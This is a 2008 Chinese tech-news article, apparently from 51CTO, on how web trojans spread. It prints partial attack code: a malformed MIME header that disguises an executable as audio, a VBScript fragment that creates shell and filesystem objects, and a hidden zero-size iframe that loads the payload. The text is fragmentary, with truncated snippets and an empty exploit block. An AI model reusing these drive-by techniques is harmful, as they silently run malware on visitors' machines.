国内资深黑客详谈网页木马
作者: 子明, 出处:51CTO.com, 责任编辑: 韩博颖,
2008-05-08 09:45
当今网络,反病毒软件日益增多,使用的反病毒技术越来越先进,查杀病毒的能力逐渐提高,但病毒制作者并不会罢休,开始利用网页木马这一危害面最广泛,传播效果最佳的方式来传播。
2.错误的MIME Multipurpose Internet Mail Extentions,多用途的网际邮件扩充协议头
常用的攻击代码:
| Content-Type: multipart/related; type="multipart/alternative"; boundary="====B====" --====B==== Content-Type: multipart/alternative; boundary="====A====" --====A==== Content-Type: text/html; Content-Transfer-Encoding: quoted-printable --====A====-- --====B==== Content-Type: audio/x-wav; name="run.exe" Content-Transfer-Encoding: base64 Content-ID: ---以下省略AAAAA N+1个--- |
| 〈script language=vbs〉 On Error Resume Next• 容错语句,避免程序崩溃 set aa=CreateObject("WScript.Shell")•建立WScript对象 Set fs = CreateObject("Scripting.FileSystemObject")•建立文件系统对象 Set dir1 = fs.GetSpecialFolder(0)•得到Windows路径 Set dir2 = fs.GetSpecialFolder(1)•得到System路径 ……省略…… |
3.Iframe 漏洞的利用
常用攻击代码:
| 〈iframe src=run.eml width=0 height=0〉〈/iframe〉 |
一个框架引用的新方式,对type="text/x-scriptlet" 的调整后,就可以实现和eml格式文件同样的效果。
4.Microsoft Internet Explorer浏览器弹出窗口Object类型验证漏洞的利用
常见攻击代码:
| ----- code cut start for run.asp ----- ----- code cut end for run.asp ----- |
- 本文关键词:

